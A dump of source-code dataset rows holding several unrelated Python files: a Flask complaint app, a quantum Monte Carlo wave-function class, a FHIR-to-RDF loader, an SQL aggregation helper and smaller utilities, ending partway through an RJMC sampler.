max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
main.py | DataScienceWithAbinash/Web-Application-For-Complaints | 1 | 12762451 | from flask import Flask,render_template,request
import random
import sqlite3
app = Flask(__name__)
DATABASE='mydb.db'
def connect_db():
    """Open and return a new connection to the configured SQLite database."""
    connection = sqlite3.connect(DATABASE)
    return connection
@app.route('/')
def index():
    """Serve the home page."""
    page = render_template('Home.html')
    return page
@app.route('/details')
def details():
    """Serve the complaint details page."""
    page = render_template('Details.html')
    return page
@app.route('/addrec')
def addrec():
    """Store a new complaint record and render the confirmation page.

    A random 6-digit reference number identifies the complaint; all other
    fields come from the request query string.
    """
    ref_number = random.randint(600001, 899999)
    name = request.args.get('name')
    email = request.args.get('email')
    consignment = request.args.get('cn')
    complaint_date = request.args.get('date')
    product = request.args.get('pn')
    complaint_nature = request.args.get('noc')

    connection = connect_db()
    connection.execute(
        "insert into crform(refno,name, email,invoice_no, invoice_date,product_name,nature_of_complaint) values(?,?,?,?,?,?,?)",
        [ref_number, name, email, consignment, complaint_date, product, complaint_nature],
    )
    connection.commit()
    connection.close()

    return render_template('Details.html', name=name, email=email, cn=consignment,
                           date=complaint_date, pn=product, noc=complaint_nature,
                           refno=ref_number)
@app.route('/registrationform')
def registrationform():
    """Serve the complaint registration form."""
    page = render_template('RegistrationForm.html')
    return page
@app.route('/retrieveform')
def retrieveform():
    """Serve the complaint-lookup form."""
    page = render_template('RetrieveForm.html')
    return page
@app.route('/showdetails')
def showdetails():
    """Look up a complaint by its reference number and render the result page.

    The reference number is read from the query string; matching rows from
    the crform table are passed to the Result.html template.
    """
    db = connect_db()
    cur = db.cursor()
    refno = request.args.get('Enter Reference number')
    # Parameterized query: the previous string-concatenated SQL was open to
    # SQL injection through the user-supplied reference number.
    cur.execute(
        "select name,email,invoice_no,invoice_date,product_name,"
        "nature_of_complaint,status from crform where refno=?",
        (refno,),
    )
    rows = cur.fetchall()
    # Close the connection (it was previously leaked).
    db.close()
    return render_template('Result.html', rows=rows)
@app.route('/result')
def result():
    """Serve the results page (no data preloaded)."""
    return render_template('Result.html')
if __name__=='__main__':
    # NOTE(review): debug=True enables the interactive Werkzeug debugger and
    # auto-reload; it must not be left enabled in production.
    app.run(debug=True)
| 2.65625 | 3 |
drf_editable/__init__.py | raiderrobert/drf-editable | 0 | 12762452 | """
Version of drf_editable
"""
__version__ = '0.0.1'
| 1.109375 | 1 |
pyqmc/slateruhf.py | shivupa/pyqmc | 0 | 12762453 | import numpy as np
def sherman_morrison_row(e, inv, vec):
    """Sherman-Morrison rank-one update of a batch of matrix inverses.

    Given ``inv[k]`` = inverse of some matrix A_k for each batch entry k,
    return the determinant ratios and the inverses of the matrices obtained
    by replacing row ``e`` of each A_k with ``vec[k]``.

    :param e: index of the row being replaced
    :param inv: (nbatch, n, n) array of current inverses
    :param vec: (nbatch, n) array of replacement rows
    :return: (ratio, invnew) where ratio[k] = det(A_k') / det(A_k)
    """
    # ratio[k] = vec[k] . inv[k][:, e]  (the determinant ratio)
    ratio = np.einsum("kj,kj->k", vec, inv[:, :, e])
    # Row-vector times inverse, per batch entry.
    row_dot_inv = np.einsum("kj,kji->ki", vec, inv)
    # Rank-one correction term, scaled by the determinant ratio.
    correction = np.einsum("ki,kj->kij", inv[:, :, e], row_dot_inv)
    updated = inv - correction / ratio[:, np.newaxis, np.newaxis]
    # Column e is simply rescaled.
    updated[:, :, e] = inv[:, :, e] / ratio[:, np.newaxis]
    return ratio, updated
class PySCFSlaterUHF:
    """A wave function object has a state defined by a reference configuration of electrons.
    The functions recompute() and updateinternals() change the state of the object, and
    the rest compute and return values from that state. """

    def __init__(self, mol, mf):
        """Build a Slater-determinant wave function from a PySCF mean-field object.

        :param mol: PySCF molecule
        :param mf: converged PySCF mean-field object (RHF, ROHF, or UHF)
        """
        # Orbitals with occupation > 0.9 are treated as occupied.
        self.occ = np.asarray(mf.mo_occ > 0.9)
        self.parameters = {}
        # Determine if we're initializing from an RHF or UHF object...
        if len(mf.mo_occ.shape) == 2:
            # UHF: mo_occ has a separate row per spin channel.
            self.parameters["mo_coeff_alpha"] = mf.mo_coeff[0][:, self.occ[0]]
            self.parameters["mo_coeff_beta"] = mf.mo_coeff[1][:, self.occ[1]]
        else:
            # RHF/ROHF: occupation > 0.9 selects alpha orbitals, > 1.1 selects
            # the doubly occupied ones used for the beta channel.
            self.parameters["mo_coeff_alpha"] = mf.mo_coeff[
                :, np.asarray(mf.mo_occ > 0.9)
            ]
            self.parameters["mo_coeff_beta"] = mf.mo_coeff[
                :, np.asarray(mf.mo_occ > 1.1)
            ]
        self._coefflookup = ("mo_coeff_alpha", "mo_coeff_beta")
        self._mol = mol
        # (n_alpha, n_beta) electron counts.
        self._nelec = tuple(mol.nelec)

    def recompute(self, configs):
        """This computes the value from scratch. Returns the logarithm of the wave function as
        (phase,logdet). If the wf is real, phase will be +/- 1."""
        # Flatten (nconfig, nelec, 3) into a single coordinate list for the AO
        # evaluator, then restore the leading dimensions.
        mycoords = configs.reshape(
            (configs.shape[0] * configs.shape[1], configs.shape[2])
        )
        ao = self._mol.eval_gto("GTOval_sph", mycoords).reshape(
            (configs.shape[0], configs.shape[1], -1)
        )
        self._aovals = ao
        self._dets = []
        self._inverse = []
        for s in [0, 1]:
            if s == 0:
                # Alpha electrons occupy the first _nelec[0] positions.
                mo = ao[:, 0 : self._nelec[0], :].dot(
                    self.parameters[self._coefflookup[s]]
                )
            else:
                # Beta electrons occupy the following _nelec[1] positions.
                mo = ao[:, self._nelec[0] : self._nelec[0] + self._nelec[1], :].dot(
                    self.parameters[self._coefflookup[s]]
                )
            # This could be done faster; we are doubling our effort here.
            self._dets.append(np.linalg.slogdet(mo))
            self._inverse.append(np.linalg.inv(mo))
        return self.value()

    def updateinternals(self, e, epos, mask=None):
        """Update any internals given that electron e moved to epos. mask is a Boolean array
        which allows us to update only certain walkers"""
        # s selects the spin channel: 0 (alpha) or 1 (beta).
        s = int(e >= self._nelec[0])
        if mask is None:
            mask = [True] * epos.shape[0]
        # Index of electron e within its spin channel.
        eeff = e - s * self._nelec[0]
        ao = self._mol.eval_gto("GTOval_sph", epos)
        mo = ao.dot(self.parameters[self._coefflookup[s]])
        # Rank-one Sherman-Morrison update instead of a full re-inversion.
        ratio, self._inverse[s][mask, :, :] = sherman_morrison_row(
            eeff, self._inverse[s][mask, :, :], mo[mask, :]
        )
        self._updateval(ratio, s, mask)

    ### not state-changing functions

    def value(self):
        """Return logarithm of the wave function as noted in recompute()"""
        # Product of the two determinants: phases multiply, log-magnitudes add.
        return self._dets[0][0] * self._dets[1][0], self._dets[0][1] + self._dets[1][1]

    def _updateval(self, ratio, s, mask):
        # Fold the determinant ratio into the stored (phase, log|det|) pair.
        self._dets[s][0][mask] *= np.sign(ratio)  # will not work for complex!
        self._dets[s][1][mask] += np.log(np.abs(ratio))

    def _testrow(self, e, vec):
        """vec is a nconfig,nmo vector which replaces row e"""
        s = int(e >= self._nelec[0])
        # Determinant ratio for replacing row e: vec . column e of the inverse.
        ratio = np.einsum(
            "ij,ij->i", vec, self._inverse[s][:, :, e - s * self._nelec[0]]
        )
        return ratio

    def _testcol(self, i, s, vec):
        """vec is a nconfig,nmo vector which replaces column i"""
        ratio = np.einsum("ij,ij->i", vec, self._inverse[s][:, i, :])
        return ratio

    def gradient(self, e, epos):
        """ Compute the gradient of the log wave function
        Note that this can be called even if the internals have not been updated for electron e,
        if epos differs from the current position of electron e."""
        s = int(e >= self._nelec[0])
        # AO gradients: leading axis runs over the 3 Cartesian components.
        aograd = self._mol.eval_gto("GTOval_ip_sph", epos)
        mograd = aograd.dot(self.parameters[self._coefflookup[s]])
        ratios = [self._testrow(e, x) for x in mograd]
        # Divide by Psi(epos)/Psi to turn d(Psi)/Psi into grad log Psi at epos.
        return np.asarray(ratios) / self.testvalue(e, epos)[np.newaxis, :]

    def laplacian(self, e, epos):
        """ Compute the laplacian Psi/ Psi. """
        s = int(e >= self._nelec[0])
        # aograd=self._mol.eval_gto('GTOval_sph_deriv2',epos)
        # Components 4, 7, 9 of deriv2 are the xx, yy, zz second derivatives;
        # their sum is the Laplacian of the AOs.
        aolap = np.sum(self._mol.eval_gto("GTOval_sph_deriv2", epos)[[4, 7, 9]], axis=0)
        molap = aolap.dot(self.parameters[self._coefflookup[s]])
        ratios = self._testrow(e, molap)
        return ratios / self.testvalue(e, epos)

    def testvalue(self, e, epos):
        """ return the ratio between the current wave function and the wave function if
        electron e's position is replaced by epos"""
        s = int(e >= self._nelec[0])
        ao = self._mol.eval_gto("GTOval_sph", epos)
        mo = ao.dot(self.parameters[self._coefflookup[s]])
        return self._testrow(e, mo)

    def pgradient(self):
        """Compute the parameter gradient of Psi.
        Returns d_p \Psi/\Psi as a dictionary of numpy arrays,
        which correspond to the parameter dictionary.
        """
        d = {}
        for parm in self.parameters:
            s = 0
            if "beta" in parm:
                s = 1
            # Get AOs for our spin channel only
            ao = self._aovals[
                :, s * self._nelec[0] : self._nelec[s] + s * self._nelec[0], :
            ]  # (config, electron, ao)
            pgrad_shape = (ao.shape[0],) + self.parameters[parm].shape
            pgrad = np.zeros(pgrad_shape)
            # Compute derivatives w.r.t MO coefficients
            for i in range(self._nelec[s]):  # MO loop
                for j in range(ao.shape[2]):  # AO loop
                    vec = ao[:, :, j]
                    pgrad[:, j, i] = self._testcol(i, s, vec)  # nconfig
            d[parm] = np.array(pgrad)  # Returns config, coeff
        return d
def test():
    """Smoke test: build LiH wave functions from RHF/ROHF/UHF mean fields and
    run the finite-difference consistency checks from pyqmc.testwf."""
    from pyscf import lib, gto, scf
    import pyqmc.testwf as testwf

    mol = gto.M(atom="Li 0. 0. 0.; H 0. 0. 1.5", basis="cc-pvtz", unit="bohr", spin=0)
    for mf in [scf.RHF(mol).run(), scf.ROHF(mol).run(), scf.UHF(mol).run()]:
        print("")
        nconf = 10
        nelec = np.sum(mol.nelec)
        slater = PySCFSlaterUHF(mol, mf)
        # Random electron configurations: (nconf, nelec, 3) Cartesian positions.
        configs = np.random.randn(nconf, nelec, 3)
        print("testing internals:", testwf.test_updateinternals(slater, configs))
        # Check gradient/laplacian/parameter gradient against finite differences
        # over a range of step sizes.
        for delta in [1e-3, 1e-4, 1e-5, 1e-6, 1e-7]:
            print(
                "delta",
                delta,
                "Testing gradient",
                testwf.test_wf_gradient(slater, configs, delta=delta),
            )
            print(
                "delta",
                delta,
                "Testing laplacian",
                testwf.test_wf_laplacian(slater, configs, delta=delta),
            )
            print(
                "delta",
                delta,
                "Testing pgradient",
                testwf.test_wf_pgradient(slater, configs, delta=delta),
            )
| 2.53125 | 3 |
custom/icds_reports/utils/aggregation_helpers/distributed/daily_feeding_forms_child_health.py | satyaakam/commcare-hq | 1 | 12762454 | from dateutil.relativedelta import relativedelta
from custom.icds_reports.const import AGG_DAILY_FEEDING_TABLE
from custom.icds_reports.utils.aggregation_helpers import (
month_formatter,
transform_day_to_month,
)
from custom.icds_reports.utils.aggregation_helpers.distributed.base import (
StateBasedAggregationDistributedHelper,
)
class DailyFeedingFormsChildHealthAggregationDistributedHelper(StateBasedAggregationDistributedHelper):
    """Aggregate daily-feeding child-health form data into AGG_DAILY_FEEDING_TABLE.

    Produces one row per child health case per month for a single state,
    summing attendance and lunch counts from the UCR data source joined
    against the daily_attendance table.
    """
    helper_key = 'daily-feeding-forms-child-health'
    ucr_data_source_id = 'dashboard_child_health_daily_feeding_forms'
    aggregate_parent_table = AGG_DAILY_FEEDING_TABLE

    def drop_index_queries(self):
        # The (state_id, month) index is dropped before the bulk insert and
        # recreated afterwards (see create_index_queries) to speed up loading.
        return [
            'DROP INDEX IF EXISTS "icds_dashboard_daily_feeding_forms_state_id_month_273d19dd_idx"',
        ]

    def create_index_queries(self):
        return [
            'CREATE INDEX IF NOT EXISTS "icds_dashboard_daily_feeding_forms_state_id_month_273d19dd_idx" ON "{}" (state_id, month)'.format(self.aggregate_parent_table),
        ]

    def aggregation_query(self):
        """Return (sql, params) inserting this state's per-case monthly aggregates."""
        current_month_start = month_formatter(self.month)
        next_month_start = month_formatter(self.month + relativedelta(months=1))

        query_params = {
            "month": month_formatter(self.month),
            "current_month_start": current_month_start,
            "next_month_start": next_month_start,
            "state_id": self.state_id,
        }

        # This query has a strange query plan so there's a few things to note.
        # This is joined on the daily_attendance table.
        # The daily_attendance aggregation only includes the most recently submitted form for each day.
        # Often an AWW may submit multiple daily attendance forms in a day,
        # so we choose the last form for each AWW's day.
        # Because the result set of docs is actually coming from daily_attendance,
        # the JOIN uses the primary key (supervisor_id, doc_id, repeat_iteration).
        # Because of this, the UCR does not have an index on (state_id, timeend)
        return f"""
        INSERT INTO "{self.aggregate_parent_table}" (
          state_id, supervisor_id, month, case_id, latest_time_end_processed,
          sum_attended_child_ids, lunch_count
        ) (
          SELECT DISTINCT ON (ucr.child_health_case_id)
            ucr.state_id AS state_id,
            ucr.supervisor_id,
            %(month)s AS month,
            ucr.child_health_case_id AS case_id,
            MAX(ucr.timeend) OVER w AS latest_time_end_processed,
            SUM(ucr.attended_child_ids) OVER w AS sum_attended_child_ids,
            SUM(ucr.lunch) OVER w AS lunch_count
          FROM "{self.ucr_tablename}" ucr
          INNER JOIN daily_attendance ON (
            ucr.doc_id = daily_attendance.doc_id AND
            ucr.supervisor_id = daily_attendance.supervisor_id AND
            ucr.state_id = daily_attendance.state_id AND
            daily_attendance.month=%(current_month_start)s
          )
          WHERE ucr.timeend >= %(current_month_start)s AND ucr.timeend < %(next_month_start)s
            AND ucr.child_health_case_id IS NOT NULL
            AND ucr.state_id = %(state_id)s
          WINDOW w AS (PARTITION BY ucr.supervisor_id, ucr.child_health_case_id)
        )
        """, query_params

    def delete_old_data_query(self):
        # No-op in this helper.
        pass

    def delete_previous_run_query(self):
        # No-op in this helper.
        pass
| 2.109375 | 2 |
lib/check_ssh.py | nejohnson2/rpi-alarm-clock | 0 | 12762455 | '''
Script to monitor ssh running on
a raspberry pi. If ssh is not
currently active, then reboot.
'''
import subprocess
def main():
    """Restart the ssh service if `service ssh status` does not report it active.

    Scans the status output for the "Active:" line; if the state token is not
    exactly "active", the service is restarted via sudo.
    """
    # universal_newlines=True decodes stdout to str: the substring tests below
    # would raise TypeError on bytes under Python 3.
    cmd = subprocess.Popen("service ssh status", shell=True,
                           stdout=subprocess.PIPE, universal_newlines=True)
    try:
        for line in cmd.stdout:
            if "Active: " in line:
                if "active" in line.split(' '):
                    return
                else:
                    subprocess.call(['sudo', 'service', 'ssh', 'restart'])
                    return
    finally:
        cmd.stdout.close()
        # Reap the child so it does not linger as a zombie.
        cmd.wait()

if __name__ == '__main__':
    main()
| 3.140625 | 3 |
Python/7/Testing1-2-3/test_testing_1_2_3.py | hwakabh/codewars | 0 | 12762456 | <filename>Python/7/Testing1-2-3/test_testing_1_2_3.py
from unittest import TestCase
from unittest import main
from testing_1_2_3 import number
class TestTesting123(TestCase):
    """Unit tests for the ``number`` kata solution."""

    def test_number(self):
        """``number`` prefixes each line with its 1-based index."""
        cases = (
            ([], []),
            (['a', 'b', 'c'], ['1: a', '2: b', '3: c']),
            (['', 'b', '', '', ''], ['1: ', '2: b', '3: ', '4: ', '5: ']),
        )
        for lines, expected in cases:
            with self.subTest(inp=lines, exp=expected):
                self.assertEqual(number(lines=lines), expected)
if __name__ == "__main__":
    # verbosity=2 prints each test name as it runs.
    main(verbosity=2)
| 3.484375 | 3 |
constants/scripts.py | lizschley/number_six | 1 | 12762457 | ''' Script constants '''
import os
from portfolio.settings import BASE_DIR
import constants.common as common
# db script arguments
FOR_PROD = 'for_prod'
UPDATING = 'updating'
DB_UPDATE = 'db_update'
TEST_UPDATE = 'test_update'

# s3 updater script arguments
HOME = 'home'
DELETE = 'delete'
# Valid data keys for S3 uploads: the shared static-file keys plus images.
static_files = list(common.STATIC_FILE_KEYS)
static_files.append('image')
S3_DATA_KEYS = static_files

# substrings used to recognize filenames / parameters
JSON_SUB = '.json'
PY_SUB = '.py'
SCRIPT_PARAM_SUBSTR = {'filename': '.json', 'process': 'process=', }

# directories (all relative to the project BASE_DIR)
INPUT_CREATE_JSON = os.path.join(BASE_DIR, 'data/data_for_creates')
INPUT_TO_UPDATER_STEP_ONE = os.path.join(BASE_DIR, 'data/data_for_updates/dev_input_step_one')
INPUT_TO_UPDATER_STEP_THREE = os.path.join(BASE_DIR, 'data/data_for_updates/dev_input_step_three')
PROD_INPUT_JSON = os.path.join(BASE_DIR, 'data/data_for_updates/prod_input_json')

# screen scraping input html and any other one_off
GENERAL_INPUT = os.path.join(BASE_DIR, 'data/input')

# filename prefixes
PROD_PROCESS_IND = 'prod_input_'
DEFAULT_PREFIX = 'input_'

# used in utilities.random methods to clear out data, to make things be easier to work with
ALWAYS_ARCHIVE_INPUT_DIRECTORIES = [
    'data/data_for_updates/dev_input_step_three/done',
    'data/data_for_creates/loaded'
]
NOT_DONE_INPUT_DIRECTORIES = [
    'data/data_for_updates/dev_input_step_three',
    'data/data_for_creates'
]
PROD_INPUT_DIRECTORY = 'data/data_for_updates/prod_input_json'
| 1.789063 | 2 |
yq_baoliu.py | yq342/Aptamer-predictor | 0 | 12762458 | <filename>yq_baoliu.py
#!/usr/bin/env python
# encoding:utf-8
import pse
import argparse
from argparse import RawTextHelpFormatter
from mlab.releases import latest_release as matlab
from mlab.releases import latest_release as matlab
from mlab.releases import latest_release as matlab
from collections import OrderedDict
import numpy as np
import math
# Add the Pse-in-One-2.0 directory to the MATLAB search path; this is the
# directory that holds the custom MATLAB helper programs used below.
matlab.path(matlab.path(),r'E:\Bioinformation\yq_aptamer\yq_aptamer_web\Pse-in-One-2.0')# set the search path; E:\... is where the MATLAB programs live
print "请输入适配体序列"
path_aptamer = matlab.input_file_01()# call our custom MATLAB function input_file_01 and take its result (the aptamer file path)
print "请输入靶点序列"
path_target = matlab.input_file_02()# call our custom MATLAB function input_file_02 and take its result (the target file path)
# print path
def read_biodata(data_file):
    '''
    Read biological sequences from a FASTA-format text file.

    Each '>' header becomes a dict key mapping to its (newline-stripped)
    sequence; the original header order is kept in a separate list, since
    a plain dict does not record insertion order here.

    :param data_file: path to a FASTA-format text file of sequences
    :return: (seq, list) -- seq maps name -> sequence string, list holds the
             names in file order
    '''
    file = open(data_file)
    seq = {}
    list = []  # dicts do not record order, so keep the keys in a list
    # Lines starting with '>' are headers and name the following sequence.
    for line in file:
        if line.startswith('>'):
            name = line.replace('>','').split()[0]
            seq[name] = ''  # sequence accumulated under this header
            list.append(name)  # remember each key in file order
        else:
            seq[name] += line.replace('\n','')  # strip the newline and append
    file.close()
    seq = OrderedDict(seq.iteritems())
    return seq,list
seq, list = read_biodata(path_aptamer)

# Generate three Pse-in-One feature encodings for the aptamer sequences; each
# pse.main(...) run writes a CSV feature file consumed later by the MATLAB
# classifier.

# PseDNC
parse = argparse.ArgumentParser(description="This is pse module for generate pse vector.",
                                formatter_class=RawTextHelpFormatter)
args = parse.parse_args()
args.alphabet = 'DNA'
args.method = 'PseKNC'
args.k = 2
args.inputfiles = [path_aptamer]
args.out = ['PseDNC_TEST.txt']
args.lamada = 3
args.w = 0.05
args.i = 'propChosen_DNC.txt'
args.labels = ['+1', '-1']
args.f = 'csv'
args.e = None
args.a = 'False'
print args
pse.main(args)

# PC-PseTNC-General
args = parse.parse_args()
args.alphabet = 'DNA'
args.method = 'PC-PseTNC-General'
args.k = 3
args.inputfiles = [path_aptamer]
args.out = ['PC_PseTNC_TEST.txt']
args.lamada = 2
args.w = 0.05
args.i = 'propChosen_TNC.txt'
args.labels = ['+1', '-1']
args.f = 'csv'
args.e = None
args.a = 'False'
print args
pse.main(args)

# SC-PseTNC-General
args = parse.parse_args()
args.alphabet = 'DNA'
args.method = 'SC-PseTNC-General'
args.k = 3
args.inputfiles = [path_aptamer]
args.out = ['SC_PseTNC_TEST.txt']
args.lamada = 2
args.w = 0.05
args.i = 'propChosen_TNC.txt'
args.labels = ['+1', '-1']
args.f = 'csv'
args.e = None
args.a = 'False'
print args
pse.main(args)
# Run the MATLAB classifier on the generated feature files and fetch the
# predicted labels (+1 / -1 per input sequence).
predict_label = matlab.web()# call our custom MATLAB function and take its result
# test_Y = np.row_stack([np.ones([145,1]),-1*np.ones([435,1])])
# print predict_label
# TP1 = 0
# FP1 = 0
# TN1 = 0
# FN1 = 0
# for i in range(len(test_Y)):
# if (test_Y[i] == 1 and (predict_label[i]) == 1):
# TP1 = TP1 + 1
# elif (test_Y[i] == 1 and (predict_label[i]) == -1):
# FN1 = FN1 + 1
# elif (test_Y[i] == -1 and (predict_label[i]) == -1):
# TN1 = TN1 + 1
# elif (test_Y[i] == -1 and (predict_label[i]) == 1):
# FP1 = FP1 + 1
#
# SN = TP1 / (float(TP1 + FN1)) * 100 # Sensitivity = TP/P and P = TP + FN
# SP = TN1 / float(FP1 + TN1) * 100 # Specificity = TN/N and N = TN + FP
# ACC = (TP1 + TN1) / (float(TP1 + FP1 + TN1 + FN1)) * 100
# MCC = (TP1 * TN1 - FP1 * FN1) / (math.sqrt(TP1 + FP1) * math.sqrt(TP1 + FN1) * math.sqrt(TN1 + FP1) * math.sqrt(TN1 + FN1))
#
# # print 'SN= ',SN
# # print 'SP= ',SP
# # print 'ACC= ',ACC
# # print 'MCC= ',MCC
# # print
# for i in range(len(predict_label)):
# if predict_label[i] == 1:
# print '\33[91m '+ '>'+list[i]+ '\33[0m'
# print '\33[91m '+ seq[list[i]]+'-----positve'+ '\33[0m'
# else:
# print '>' + list[i]
# print seq[list[i]]+'-----negative'
# Print each input sequence with its prediction; positives are highlighted in
# red via ANSI escape codes (\33[91m ... \33[0m).
for i in range(len(predict_label)):
    if predict_label[i] == 1:
        print '\33[91m '+ '>'+list[i]+ '\33[0m'
        print '\33[91m '+ seq[list[i]]+'-----positve'+ '\33[0m'
    else:
        print '>' + list[i]
        print seq[list[i]]+'-----negative'
| 2.390625 | 2 |
venv/lib/python3.8/site-packages/django/utils/hashable.py | Joshua-Barawa/My-Photos | 16 | 12762459 | <gh_stars>10-100
from django.utils.itercompat import is_iterable
def make_hashable(value):
    """
    Attempt to make value hashable or raise a TypeError if it fails.

    The returned value should generate the same hash for equal values.
    """
    # Dicts become sorted tuples of (key, hashable-value) pairs.
    if isinstance(value, dict):
        sorted_items = sorted(value.items())
        return tuple((key, make_hashable(item)) for key, item in sorted_items)
    # Try hash to avoid converting a hashable iterable (e.g. string, frozenset)
    # to a tuple.
    try:
        hash(value)
    except TypeError:
        if is_iterable(value):
            return tuple(make_hashable(element) for element in value)
        # Non-hashable, non-iterable.
        raise
    return value
| 3.078125 | 3 |
fhirtordf/loaders/fhirjsonloader.py | dnstone/fhirtordf | 0 | 12762460 | <gh_stars>0
# Copyright (c) 2017, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of the Mayo Clinic nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
from typing import Optional, Union
from jsonasobj import load, JsonObj
from rdflib import Graph, URIRef
from fhirtordf.fhir.fhirmetavoc import FHIRMetaVoc
from fhirtordf.loaders.fhircollectionloader import FHIRCollection
from fhirtordf.loaders.fhirresourceloader import FHIRResource
def fhir_json_to_rdf(json_fname: str,
                     base_uri: str = "http://hl7.org/fhir/",
                     target_graph: Optional[Graph] = None,
                     add_ontology_header: bool = True,
                     do_continuations: bool = True,
                     replace_narrative_text: bool = False,
                     metavoc: Optional[Union[Graph, FHIRMetaVoc]] = None) -> Graph:
    """
    Convert a FHIR JSON resource image to RDF
    :param json_fname: Name or URI of the file to convert
    :param base_uri: Base URI to use for relative references.
    :param target_graph: If supplied, add RDF to this graph. If not, start with an empty graph.
    :param add_ontology_header: True means add owl:Ontology declaration to output
    :param do_continuations: True means follow continuation records on bundles and queries
    :param replace_narrative_text: True means replace any narrative text longer than 120 characters with
    '<div xmlns="http://www.w3.org/1999/xhtml">(removed)</div>'
    :param metavoc: FHIR Metadata Vocabulary (fhir.ttl) graph
    :return: resulting graph
    """
    def check_for_continuation(data_: JsonObj) -> Optional[str]:
        # Bundles / search results may carry a 'link' list whose entry with
        # relation == 'next' points at the continuation page.
        if do_continuations and 'link' in data_ and isinstance(data_.link, list):
            for link_e in data_.link:
                if 'relation' in link_e and link_e.relation == 'next':
                    return link_e.url
        return None

    if target_graph is None:
        target_graph = Graph()

    # Accept either a ready graph or a FHIRMetaVoc wrapper; default to a fresh load.
    if metavoc is None:
        metavoc = FHIRMetaVoc().g
    elif isinstance(metavoc, FHIRMetaVoc):
        metavoc = metavoc.g

    # Process the first page, then any continuation pages it links to.
    page_fname = json_fname
    while page_fname:
        data = load(page_fname)
        if 'resourceType' in data and data.resourceType != 'Bundle':
            # A single (non-bundle) resource.
            FHIRResource(metavoc, None, base_uri, data, target=target_graph, add_ontology_header=add_ontology_header,
                         replace_narrative_text=replace_narrative_text)
            page_fname = check_for_continuation(data)
        elif 'entry' in data and isinstance(data.entry, list) and 'resource' in data.entry[0]:
            # A bundle / collection of resources.
            FHIRCollection(metavoc, None, base_uri, data, target=target_graph,
                           add_ontology_header=add_ontology_header if 'resourceType' in data else False,
                           replace_narrative_text=replace_narrative_text)
            page_fname = check_for_continuation(data)
        else:
            # NOTE(review): unrecognized input clears target_graph, so the
            # function returns None even when earlier pages were already
            # converted — confirm this "invalid input" signal is intended.
            page_fname = None
            target_graph = None
    return target_graph
| 1.132813 | 1 |
RJMC_class_functions.py | ocmadin/RJMC_2CLJQ | 1 | 12762461 | <filename>RJMC_class_functions.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 6 12:04:57 2018
MCMC/RJMC Toolbox: A class of functions that implement RJMC/MCMC algorithms, tailored towards the use of RJMC
@author: owenmadin
"""
from __future__ import division
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import pandas as pd
import yaml
from scipy.stats import distributions
from scipy.stats import linregress
from scipy.optimize import minimize
import random as rm
from pymc3.stats import hpd
#%%
# Simplify notation: short aliases for the scipy/numpy distribution helpers
# used throughout the sampler.
dnorm = distributions.norm.logpdf    # normal log-density
dgamma = distributions.gamma.logpdf  # gamma log-density
duni = distributions.uniform.logpdf  # uniform log-density
rnorm = np.random.normal             # normal random draw
runif = np.random.rand               # uniform(0, 1) random draw
norm=distributions.norm.pdf          # normal density
unif=distributions.uniform.pdf       # uniform density
'''
properties = 'rhol'
def calc_posterior(model,eps,sig,Q):
logp = 0
# print(eps,sig)
# Using noninformative priors
logp += duni(sig, 0.2, 0.5)
logp += duni(eps, 100,200)
if model == 0:
Q=0
if model == 1:
logp+=duni(Q,0,2)
# OCM: no reason to use anything but uniform priors at this point. Could probably narrow the prior ranges a little bit to improve acceptance,
#But Rich is rightly being conservative here especially since evaluations are cheap.
# print(eps,sig)
#rhol_hat_fake = rhol_hat_models(T_lin,model,eps,sig)
rhol_hat = rhol_hat_models(T_rhol_data,model,eps,sig,Q) #[kg/m3]
Psat_hat = Psat_hat_models(T_Psat_data,model,eps,sig,Q) #[kPa]
# Data likelihood
if properties == 'rhol':
logp += sum(dnorm(rhol_data,rhol_hat,t_rhol**-2.))
#logp += sum(dnorm(rhol_data,rhol_hat,t_rhol**-2.))
elif properties == 'Psat':
logp += sum(dnorm(Psat_data,Psat_hat,t_Psat**-2.))
elif properties == 'Multi':
logp += sum(dnorm(rhol_data,rhol_hat,t_rhol**-2.))
logp += sum(dnorm(Psat_data,Psat_hat,t_Psat**-2.))
return logp
'''
def RJMC_outerloop(calc_posterior,n_iterations,initial_values,initial_sd,n_models,swap_freq,tune_freq,tune_for,jacobian,transition_function,AUA_opt_params,AUA_Q_opt_params):
    """Outer reversible-jump MCMC driver.

    Runs n_iterations of RJMC_Moves starting from initial_values (column 0 of
    the state vector is the model index), tuning the proposal standard
    deviations every tune_freq steps during the first tune_for iterations.

    Returns (trace, logp_trace, attempt_matrix, acceptance_matrix, prop_sd,
    accept_vector).
    """
    #INITIAL SETUP FOR MC LOOP
    #-----------------------------------------------------------------------------------------#
    n_params = len(initial_values) #One column is the model number
    accept_vector=np.zeros((n_iterations))
    prop_sd=initial_sd
    #Initialize matrices to count number of moves of each type
    attempt_matrix=np.zeros((n_models,n_models))
    acceptance_matrix=np.zeros((n_models,n_models))
